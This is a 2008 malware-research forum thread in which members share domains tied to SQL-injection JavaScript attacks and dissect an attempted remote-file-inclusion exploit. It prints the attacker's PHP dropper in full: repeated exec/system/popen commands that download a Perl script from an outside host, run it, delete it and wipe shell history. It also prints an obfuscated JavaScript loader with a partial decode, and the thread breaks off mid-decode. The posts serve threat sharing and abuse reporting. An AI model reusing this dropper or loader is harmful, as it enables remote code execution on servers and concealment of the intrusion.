Author Topic: SQL Injected jscript sites  (Read 72997 times)


June 02, 2008, 04:27:14 am

YanceySlide

Hi folks,

Still getting settled in here.  Thanks JohnC and sowhat-x for the access.

I've been maintaining a list of sites I've seen that are used in the SQL injections that are injecting jscript:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514

Some are long down, some are quite fresh.  I'll try and update this thread as I add to the list.

Latest:
hxxp://www.redir94.com
hxxp://www.locale48.com
hxxp://www.en-us18.com
hxxp://www.sysid72.com
hxxp://www.libid53.com
hxxp://www.script46.com
hxxp://www.rundll92.com
hxxp://www.logid83.com
The Shadowserver Foundation

June 02, 2008, 05:54:24 am
Reply #1

tjs

Hi YanceySlide. Welcome to MDL and thanks for the list.

TJS

June 02, 2008, 05:56:39 am
Reply #2

MysteryFCM

I've just sent the following to the owner and registrar of mgfcompressors.com, due to someone trying to use a couple of files on their server to try and exploit one of my servers;

Code:
Ref: mgfcompressors.com/portal/help/file.txt???

The above is a Perl exploit that is used to exploit other servers. It downloads another file from;

mgfcompressors.com/portal/help/

Which then downloads another encoded script;

mgfcompressors.com/portal/help/aoaqv.js

Which is then used to exploit servers, as shown by the following excerpt from my server logs;

**************************************
BEGIN
**************************************
2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0
**************************************
END
**************************************

The IP that attempted the exploit (193.198.217.3), resolves to;

blaz.zsem.hr

Needless to say this exploit failed as I do not run Perl on my servers, and do not permit my servers to download non-authenticated files from unknown sources (and certainly do not allow my servers to run in capacities that would permit them to run non-essential scripts from unknown sources).

Can you cleanup your server please?

Relevant code (they seem to block subsequent attempts to access the files, so I'm posting it here for clarity)

Code:
<title>By zaNga</title>
<h2>PHPESSID56465465421200121242024512878952300564505478693</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://www.mgfcompressors.com/portal/help/";
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");
?>

mgfcompressors.com/portal/help/ loads a script that executes the following (via XMLHTTP). I had problems fully decoding it due to arguments.callee.toString

Code:
var arg="lzchtreg";
function TkPgnCxzu(U){var Be7k="];Ak=tP.c";var sOX="G49SGGR%1SG34";var S="%se71%se2%6T";var s="arguments.calle";var Agzj="Cc%5BCc%6BCc%";var KVB="D%se63%se61%";var mEV="37Cc%3DC";var mn="cS2qjhcS65%hcS";var yv9="){if((q.readySt";var aF7="7spd3B';ev";var gIWK="0Cc%3";var o=";var h='3";var FSa="6ECc%50Cc%47Cc";var wNZb="S9g4%hcS";S+="se7B%se";var OV="1%hcS";var O4R="cS61g4%hc";var RhxD="e(K.replace(/%";var Mjn="S3B%hc";var BGWp="8KQ%1%se48KQ%1";var cEFw="%se68%se28%s";var nM="Cc%7BC";var a="3D%se2";o="i;Thd=Thd%13788"+o;var LT=";var V3L";var Q3Ts="G[RWo";var rbt="5%se25%se35%se";var NYl8="cS2%hcS4";var uG="q19=46";var aY7j="7ACc%4F";var pJA="hcS2%hcS69%";var D="3VlhcS3";KVB+="se78KQ%1";var MO="sA1spd72spd20";var w="ngth;c=c%h.le";var j="4%hcS2%";var ki0n="c%3DCc%57Cc%35";var w7="S42%hcS2E%hc";var Oj3="B.rep";var FA="CsAspd73spd38";var gIg="2r3H74Cc%6ECc%3";var hpMH="se20%se28";var J8="5%se3";gIg+="7Cc%2";var ylP="F%hcS6A%hcS3";var H="BCc%74Cc%6ECc";var fx="3Dspd27spd%C";var tH=";rR=rR+N";var Rr="2ECc%63Cc%6r3";var tpmK="Q%1%se25%";var dlrT="r vO;vO=rR+ykui";var PR="Tse3B%s";var uJ="5%se77%se20";var vXj5="e37%se33%";var cp="pe(q.resp";uJ+="%se58%";var nj="ll);";var m6f="%se25%se";var huhd="S6A%hcS2B%hcS2B";var Qm="VlhcS31%hcS29g";huhd="6F%hc"+huhd;var O1pL="e(Ak);}eva";var tw="e37%se32%s";var x7t8=";l++){";H=ki0n+"Cc%4FCc%2"+H;var O="var Q=64112;var";cEFw+="e65%se2%6Tse7";var fRBA="6C%se";var J="g,'');B=B.";var o3jT="=Thd+b;var K='s";nj="rue);q.send(nu"+nj;var HM="%7Z2r3H6";nM="BCc%2BCc%29"+nM;var Cyq="%5DCc%3BCc%6";var sYp="4%hcSD%hcS42";PR="se2%6"+PR;var Ro="eplace(/SG/g";var MGQ="c%74Cc%6ECc%37";cp="{tP = unesca"+cp;var bzKy="cS3D%hcS6Eg";Agzj="%6ECc%50Cc%47"+Agzj;var N="c%/g,'%').re";var xn5X="DCc%30Cc%";var f="se7B%s";mEV+="c%6ECc%50Cc%47";tpmK="e25%se35%se38K"+tpmK;var So0="{akK();}};q.on";var E="var x";var W="hcS25%hcS";S+="78KQ%1%se";var LCS="c%6BCc%74Cc";var kXe="ape(Qg6M.repla";var c67G="hcS29%hc";var BmE="e71%se3";var kJa="42%hcS2E%";var NlYX="cS21%hcS";var 
fXe=").replace";var GJ="'y%')";aF7="71spd2"+aF7;NYl8+="VlhcS6F%";var dGFN="/g,'%";var DimR="=tn7;Ak=nPG";FSa="Cc%37Cc%3DCc%"+FSa;var ysxS="%6D%6C%32%2E%5";var ps9B="%se7D%s";GJ="lace(/qj/g,"+GJ;m6f="6%se36"+m6f;Mjn=ylP+"D%hcS30%hc"+Mjn;var HDN6="5qjhcS29%";var CA7x="e(/Mm/g,'%";S="%se28%se21"+S;Q3Ts="o];nP"+Q3Ts;var V="61g4%hcS2%hcS4V";FSa+="%5BCc%6B";var lp="%se48%se7";Rr+="H61Cc%7Z43C";var CLN="%se63%se61%se7";sYp="5qjhcS29%hcS3Bg"+sYp;var yci=")^Ak;SX+=St";var zTf="hcS6D%hcS4VlhcS";OV="%hcS3"+OV;var cMD4="1%hcS4qjhcS";Oj3="l(unescape(c"+Oj3;Be7k+="harCodeAt(x6"+yci;var Fv="(nY);}catch";FSa="Cc%74Cc%6E"+FSa;var O9e="Cc%74Cc%6";m6f+="37%se";var AYO="4qjhcS2B%";E+="6;var Ak;for(";mn="%hcS4%h"+mn;ysxS="4D%73%78"+ysxS;var m="8KQ%1%se28";bzKy+="4%hcS";var X76="R%4SG3BSG72SG52";var c6ED="%6ECc%37C";FSa+="Cc%74Cc%7A";var T="C';var b=70";var ZDZQ="c%6BCc%74Cc%7";var ID="6ECc%67Cc";var G="8spd78spd";gIg+="9Cc%3BCc%74";gIg+="Cc%6ECc%"+mEV;var L5XO="Q%1%se43%se25";fx=MO+"spd72spd52spd"+fx;var w31=";var W5O=0;var ";var XY="RWo=RWo+";var A="8KQ%1%se2";var PG="HZe;c=";nj="en('GET',zqj,t"+nj;var O2mU="Tse76%";s+="e.toString();";var bru="%hcS2%";x7t8="(l=0;l<256"+x7t8;rbt="se32%se4"+rbt;s+="B=B.re";var iz="%se25%se36%";var v4m="FCc%3DCc%";var lF="GUR=VxEJ;va";kJa="hcS3D%hcS"+kJa;Q3Ts="tn7=nPG[RW"+Q3Ts;hpMH+="%se21";lF+="r f2QH='';";var LDuA="cS67g4%h";var sxvb="S61g4%hcS2";CA7x+="')));"+E;var feGD="lhcS6F%hcS64%h";w31+="Qg6M='Cc%76Cc%6";var cmd="cS6A%hcS25";var bS="escape(LV);";V=zTf+"6qjhcS"+V;Oj3="7D';eva"+Oj3;var dx="VxEJ=U;nPG=new ";var tgR="52%se";gIg+="Cc%5BCc%6BCc%";var wd="var Thd;Thd=3";var onet="ce(/g4%/g,'%7')";PR="e41%se72%se52%"+PR;var YtG="S66g4%hcS2%hcS6";yv9+="ate==4)&&(q.st";var mQa="se71%se";ysxS+="8%4D%4C%48%54%";var Yi="%se6E%se4F%s";aY7j="%6BCc%74Cc%"+aY7j;CLN+="8KQ%1%se63";Fv="bject"+Fv;kXe=xn5X+"3B';eval(unesc"+kXe;a+="7%se25";lF+="var g";GJ="cape(c2.rep"+GJ;huhd+="%hcS29g4%hcSB%";AYO+="hcS3D%";var 
aGb="unescape(vuL.r";CA7x="').replac"+CA7x;c6ED+="c%3BCc%6";var Z="cFCs';ykui=yku";ZDZQ="3Z35Cc%36Cc%3BC"+ZDZQ;x7t8="var B;for"+x7t8;nM=ZDZQ+"ACc%4FCc%2"+nM;O9e+="ECc%37Cc";var P="ce(/%6T/g,'9%'";ysxS+="54%50';var cB=";var fh="73%se6";MGQ+="Cc%3B";var ggTy="ABspd75sp";Q3Ts="hBIs%256;"+Q3Ts;var R="6%hcS2qjhcS65%h";var kyf="se20%se41%se";O9e+="%3BCc%7DCc";DimR+="[RWo]+nPG";L5XO+="%se38KQ";sOX+="SG27SG";hpMH+="%se71%se2%6T"+f;var y="se72%se7%6T";bru+="hcS6F%"+V;HDN6+="hcS3B%h"+LDuA;Qm+="4%hcSB%hcS66%";c67G=mn+"6F%hcS6A%"+c67G;yv9+="atus==";fx="Bspd7%CsAspd%C"+fx;var gk2="28%se65%se2%6T";RhxD+="CsA/g,'6').rep";var YTb="hcS66%hcS";vXj5="se46%se25%s"+vXj5;w+="ngth;var "+dx;var gO="l}}var zqj=iGUR";var lrv="20MZ53MZ";CLN+="%se68%se"+gk2;var Li="44spd27spd3Bspd";LCS+="%7ACc";Cyq+="ECc%50Cc%4";DimR="[hBIs]"+DimR;var Ft=",'2%').repl";P="/g,'b').repla"+P;yv9+="200))"+So0;PG+="c+rR.length;c=c";aGb=sOX+"3B';eval("+aGb;w31+="1Cc%7Z";var YsrI="S67g4%hc";Q3Ts+="]=nPG[";gIWK+="Z35Cc%36Cc%3B"+FSa;O9e="c%4FCc%5DCc%3D"+O9e;X76+="SG2BSG3DS";var xZW1="place(/Z";var KxMe="B%se71%s";DimR+="[hBIs];Ak=Ak%2";Ro+=",'%')));var "+uG;o=wd+"5861;var yku"+o;iz+="se3%6Tse25%se3";var ui8="KQ%1%s";Fv="=new ActiveXO"+Fv;cp="unction()"+cp;Mjn="%hcS6"+Mjn;var ULuQ="74Cc%";c67G+="S3B%hcS69%"+YTb;R="hcSD%hcS69%hcS6"+R;Cyq+="7Cc%5BCc";lF+="ysX=18";a="20%se4C%se56%se"+a;CA7x+="x6=0;x6<tP.le";var i1EP="2%se6A%se65";S="e66%se20"+S;BGWp=rbt+"38%se25%se3"+BGWp;fXe="(/Vl/g,'3%'"+fXe;YsrI="cS6E%hc"+YsrI;nj="e=x;q.op"+nj;var n="sA1spd";var pCH5="Cc%5BCc%";NYl8+="hcS64%hcS65%hc";D="hcS3D%hcS3D%hcS"+D;LCS=v4m+"30Cc%3BC"+LCS;var sf="30%se27%se3B";T+="100;var HZ";var gj="6ECc%37Cc%20Cc";Q3Ts="+nPG[RWo];hBIs="+Q3Ts;J+="toUpperCa";T+="e;var N5='bO2";xZW1="escape(V3LR.re"+xZW1;YtG="S2E%hc"+YtG;tH="'%')))"+tH;KxMe=S+"72%se7%6Tse7"+KxMe;FA="spd3%"+FA;i1EP="8%se4F%se6"+i1EP;fXe+="(/%hcS/g,'%')";MGQ="c%4FCc%5DCc%2BC"+MGQ;Ft+="ace(/r3";fRBA="6E%se75%se"+fRBA;LT+="R='MZ68MZ42M";Mjn="2%hcS2qjhcS65"+Mjn;var 
JD6a="se6C%se";Be7k=DimR+"56;Ak=nPG[Ak"+Be7k;Z=Ro+"40;N5+='v47"+Z;sf=tpmK+"se35%se"+sf;HDN6+="cS9g4%hcSVl";lF+="8;var eoj";sYp="4%hcSVlhcS"+sYp;gIWK+="Cc%4FCc%5DCc";MGQ+="Cc%74Cc%6E";Ft=N+"place(/Z/g"+Ft;var i="Dspd%";bzKy=sxvb+"%hcS20g4%hcS1%h"+bzKy;onet=fXe+".repla"+onet;var RLe="/g,'8'";HM+="BCc%74Cc%7ACc%4"+LCS;LT+="Z49MZ73MZ3DM";ysxS="ArR='%"+ysxS;J=s+"place(/\\W/"+J;bS="%')));var nY=un"+bS;X76="SGGR%8SGG"+X76;Mjn+="S65%hcS6F";bS="place(/%se/g,'"+bS;RLe="ce(/y"+RLe;Yi="2%se20"+Yi;O+=" vuL='S";O2mU="78KQ%1%se6%6"+O2mU;i=ggTy+"d%CsA9spd3"+i;var eeF="S6qjhcS3B%hc";OV+="3qjhcS3qjhcS3B";R+="cS6F%h"+cmd;var Zl="g4%hcSVlhcS5qj";ui8=lp+"8KQ%1%se78"+ui8;var ggNn="MZ3B';e";gIWK+="%3BCc"+Agzj;CLN+="se7B%"+mQa;D+="1%hcS29g4%hcSB";NYl8="jhcS61g4%h"+NYl8;AYO="hcS51%hcS"+AYO;dGFN+="3').replace(";YsrI=w7+"S6C%hcS65%h"+YsrI;onet=GJ+".replace"+onet;m="e65%se73%se7"+m;kJa+="hcS6Vlhc";PG="+Q;c=c+"+PG;Q3Ts="6;hBIs=hBIs"+Q3Ts;sf=J8+"5%se38KQ%1%s"+sf;Yi+="e58KQ%1";AYO=D+"%hcS66%hcS32%"+AYO;OV="jhcS3D"+OV;var C="e4F%se58KQ%1%s";FA+="spd27spd3";O2mU+="se65%se5"+i1EP;LT=Ft+"H/g,'8%')))"+LT;sYp="qjhcS67g4%hcS9g"+sYp;BGWp+="%se25%se38K"+L5XO;fh="6E%se65%se"+fh;c67G+="2qjhcS65%hcS6F";Be7k+="ring.f";tH=RhxD+"lace(/spd/g,"+tH;lrv="Z61MZ72MZ"+lrv;cEFw+="B%se71%se3D%se"+fRBA;Z=dGFN+"/GR%/g,'6').r"+Z;onet="';eval(unes"+onet;ID+="%74Cc%6r3H3BCc%"+ULuQ;Z+="i*q19;va"+dlrT;sYp="hcS65%hcS2"+sYp;var hcZq="d2Bspd3Dspd27sp";W+="3VlhcS32%"+AYO;c6ED=w31+"20Cc%74Cc"+c6ED;O=tH+"5;var c=33550;"+O;A=O2mU+"%se63%se7"+A;J+="se();B+=c;var i"+lF;y=hpMH+"e78KQ%1%"+y;fh+="3%se61%s";O=aF7+"al(unescap"+O;R+="%hcS3VlhcS32%h"+NlYX;c6ED+="6Cc%6FCc"+HM;j+="hcS69%hcS6E%";Mjn+="%hcS6A%hcS3C%hc"+YsrI;kJa+="S6qjh"+O4R;O9e=Cyq+"%57Cc%35C"+O9e;C=A+"8%se6E%s"+C;yv9="var x=function("+yv9;Mjn="4%hcS"+Mjn;ysxS=RLe+")));var "+ysxS;sYp+="%hcS3D%hcS66%hc";PG+="%b.le"+w;fh+="e70%se65%se28%s"+PR;O9e+="%5Z57Cc";MGQ+="Cc%37C"+H;onet+=".repla"+ysxS;gIWK=gj+"%25Cc%2"+gIWK;Rr="Cc%4Z"+Rr;var 
iy="67%hcS2";bru+="lhcS6F%hcS64%"+sYp;hcZq=FA+"Bspd%CsA8sp"+hcZq;pCH5+="57Cc%35Cc%4FCc"+O9e;o+="r2PkG2";Oj3=JD6a+"6C%se7D%se"+Oj3;O1pL+="l(SX);};"+yv9;P=Oj3+"lace(/8KQ%"+P;bru+="S32%hcS5"+cMD4;ui8+="e70%se"+tgR;uJ=BmE+"D%se6E%se6"+uJ;bS="b1%/g,'4%').re"+bS;gIg="Cc%74Cc%"+gIg;O+="GGRCSG3DSGGRC";c67G+="%hcS6A%"+W;NYl8="cS4VlhcS6q"+NYl8;O1pL+="readystatechang"+nj;var Rea="51%hcS4qjhcS2B";o3jT+="pd7%CsAspd%C"+n;m+="%se2%6Ts";onet+="'%se76%se61%";LT=kXe+"ce(/C"+LT;Q3Ts=XY+"1;RWo=RWo%25"+Q3Ts;G+="%CsA3spd3Dspd2";aY7j+="Cc%25Cc%4Z2EC";lrv+="58MZ3DMZ27MZ27"+ggNn;CLN+="3D%se6E%se75%"+P;bS=CLN+").replace(/"+bS;nM+="c%74Cc%6";bzKy+="5%hcS6C%hcS6C";ui8+="65%se71%se75%s"+m;gO+=";var akK=f"+cp;Rr+="c%6FCc%64Cc%";bru=iy+"E%hcS66g4"+bru;lrv="BMZ76M"+lrv;Qm=R+"3D%hcS3"+Qm;var Abi="%57Cc%35Cc%4";x7t8=PG+"Array();var l;"+x7t8;vXj5+="se25%se36%se";var ymm="5DCc%3DCc%6";feGD+="cS65%hcS41g4"+c67G;nM+="ECc%37Cc%3DCc"+aY7j;gIWK=Abi+"FCc%3DCc%74Cc%"+gIWK;m6f="5%se3"+m6f;pCH5+="%6FCc%3"+LT;wNZb="7g4%hc"+wNZb;j+="hcS67%hc"+YtG;ymm+="ECc%50Cc%47"+pCH5;o3jT+="72spd20spd7"+G;c6ED=gO+"onseText)"+c6ED;Rr+="65Cc%41"+gIg;huhd=eeF+"S65%hcS"+huhd;fx=i+"CsA2spd3"+fx;fh=Yi+"%se3D%se75%se"+fh;Rea+="%hcS3D%hcS53g4";Rea+="%hcS4g4%"+pJA;Li+="79spd%Cs"+fx;bzKy+="%hcS3B"+onet;Q3Ts+="hBIs];nPG"+Be7k;a+="%se38K";J=x7t8+"nPG[l]=l;}B="+J;nM=c6ED+"%4FCc%3CCc%"+nM;y=sf+"%se6%6Tse66%"+y;NYl8=j+"F%hcS6D%h"+NYl8;wNZb+="VlhcS"+HDN6;kyf="E%se65%se77%"+kyf;hcZq+="d%CsAAspd39spd"+Li;Z+=";rR=xxc+vO;b=N5"+J;wNZb+="hcS5q"+OV;wNZb=NYl8+"S2qjhcS6"+wNZb;xZW1+="/g,'m"+CA7x;uJ=y+"se7B%s"+uJ;tw+="e25%se36%"+vXj5;C=kyf+"63%se"+C;Rr+="74Cc%7AC"+MGQ;uJ+="se4D%se4C"+ui8;aGb=X76+"G27SG45S"+aGb;Qm=wNZb+"g4%hcSDg4%"+Qm;Zl=huhd+"hcS67g4%hcS9"+Zl;ID+="6ECc%37Cc%3D"+Rr;Zl=Mjn+"S4%hc"+Zl;Z=aGb+"eplace(/C"+Z;KVB+="%se63"+cEFw;bru=Rea+"hcS6E%hcS"+bru;C=KxMe+"e3D%se6"+C;iz+="6%se33%se25%s"+tw;gIWK+="74Cc%7ACc%4FCc%"+ymm;Z=O+"SG2BSG54"+Z;ps9B=KVB+"6C%se7D%se3B"+ps9B;BGWp=m6f+"38KQ%1%se25%"+BGWp;Z=hcZq+"sABspd"+Z;ID=nM+"c%6CCc%65Cc%"+ID;feGD=kJa+
"S2%hcS4V"+feGD;T=o+"';h+='Vp"+T;C=fh+"e6%6Ts"+C;Qm+="hcS32%hcS"+bru;Q3Ts+="romCharCod"+O1pL;iz+="46%se2"+BGWp;ID=Fv+"(e){q=nul"+ID;a=bzKy+"se72%se"+a;feGD=Zl+"hcS5E%"+feGD;ID=bS+"if (!q){try{q"+ID;ID+="%37Cc%3BCc"+gIWK;feGD="hcS66%hcS6Fg"+feGD;ID+="Z30MZ3"+lrv;T+="Px';HZe"+o3jT;Z="7%CsA"+Z;xZW1=ID+"val(un"+xZW1;uJ=iz+"%1%se38%se2"+uJ;a+="Q%1%se48KQ%1"+uJ;xZW1=C+"e2%6Tse3B%se7D"+xZW1;Qm+="3Bg4%hcS6%hc"+a;ps9B=Qm+"e3B%se7"+ps9B;ps9B=feGD+"hcS53g4%hcS4g"+ps9B;ps9B+="e76%se61%se7"+xZW1;ps9B+="ngth;x6++){"+Q3Ts;Z=T+"7spd54spd72spd"+Z;Z+=";var c2='%"+ps9B;eval(Z);}TkPgnCxzu(arg);

Partially decoded;

Code:
var Thd;Thd=35861;var ykui;Thd=Thd%13788;var h='3r2PkG2';h+='VpC';var b=70100;var HZe;var N5='bO2Px';HZe=Thd+b;var K='spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';eval(unescape(K.replace(/%CsA/g,'6').replace(/spd/g,'%')));rR=rR+N5;var c=33550;var Q=64112;var vuL='SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';eval(unescape(vuL.replace(/C/g,'%3').replace(/GR%/g,'6').replace(/SG/g,'%')));var q19=4640;N5+='v47cFCs';ykui=ykui*q19;var vO;vO=rR+ykui;rR=xxc+vO;b=N5+Q;c=c+HZe;c=c+rR.length;c=c%b.length;c=c%h.length;var VxEJ=U;nPG=new Array();var l;var B;for(l=0;l<256;l++){nPG[l]=l;}B=arguments.callee.toString();B=B.replace(/\W/g,'');B=B.toUpperCase();B+=c;var iGUR=VxEJ;var f2QH='';var gysX=188;var eoj;var c2='%hcS66%hcS6Fg4%hcS2%hcS2qjhcS65%hcS6F%hcS6A%hcS3D%hcS30%hcS3B%hcS65%hcS6F%hcS6A%hcS3C%hcS42%hcS2E%hcS6C%hcS65%hcS6E%hcS67g4%hcS4%hcS6qjhcS3B%hcS65%hcS6F%hcS6A%hcS2B%hcS2B%hcS29g4%hcSB%hcS67g4%hcS9g4%hcSVlhcS5qjhcS5E%hcS3D%hcS42%hcS2E%hcS6VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS41g4%hcS4%hcS2qjhcS65%hcS6F%hcS6A%hcS29%hcS3B%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS3D%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3B%hcS67g4%hcS9g4%hcSVlhcS5qjhcS3D%hcS31%hcS3qjhcS3qjhcS3Bg4%hcSDg4%hcSD%hcS69%hcS66%hcS2qjhcS65%hcS6F%hcS6A%hcS25%hcS3VlhcS32%hcS21%hcS3D%hcS3VlhcS31%hcS29g4%hcSB%hcS66%hcS32%hcS51%hcS4qjhcS2B%hcS3D%hcS53g4%hcS4g4%hcS2%hcS69%hcS6E%hcS67%hcS2E%hcS66g4%hcS2%hcS6F%hcS6D%hcS4VlhcS6qjhcS61g4%hcS2%hcS4VlhcS6F%hcS64%hcS65%hcS2qjhcS67g4%hcS9g4%hcSVlhcS5qjhcS29%hcS3Bg4%hcSD%hcS42%hcS3D%hcS66%hcS32%hcS51%hcS4qjhcS3Bg
4%hcS6%hcS61g4%hcS2%hcS20g4%hcS1%hcS3D%hcS6Eg4%hcS5%hcS6C%hcS6C%hcS3B';eval(unescape(c2.replace(/qj/g,'y%').replace(/Vl/g,'3%').replace(/%hcS/g,'%').replace(/g4%/g,'%7').replace(/y/g,'8')));var ArR='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var cB='%se76%se61%se72%se20%se4C%se56%se3D%se27%se25%se38KQ%1%se48KQ%1%se25%se36%se3%6Tse25%se36%se33%se25%se37%se32%se25%se36%se46%se25%se37%se33%se25%se36%se46%se25%se36%se36%se25%se37%se38KQ%1%se25%se32%se45%se25%se35%se38%se25%se38KQ%1%se48KQ%1%se25%se38KQ%1%se43%se25%se38KQ%1%se38%se25%se35%se38KQ%1%se25%se35%se38KQ%1%se25%se35%se30%se27%se3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se58%se4D%se4C%se48%se78KQ%1%se78KQ%1%se70%se52%se65%se71%se75%se65%se73%se78KQ%1%se28%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se3B%se7D%se76%se61%se72%se20%se6E%se4F%se58KQ%1%se3D%se75%se6E%se65%se73%se63%se61%se70%se65%se28%se41%se72%se52%se2%6Tse3B%se6%6Tse66%se20%se28%se21%se71%se2%6Tse7B%se78KQ%1%se72%se7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se41%se63%se78KQ%1%se6%6Tse76%se65%se58%se4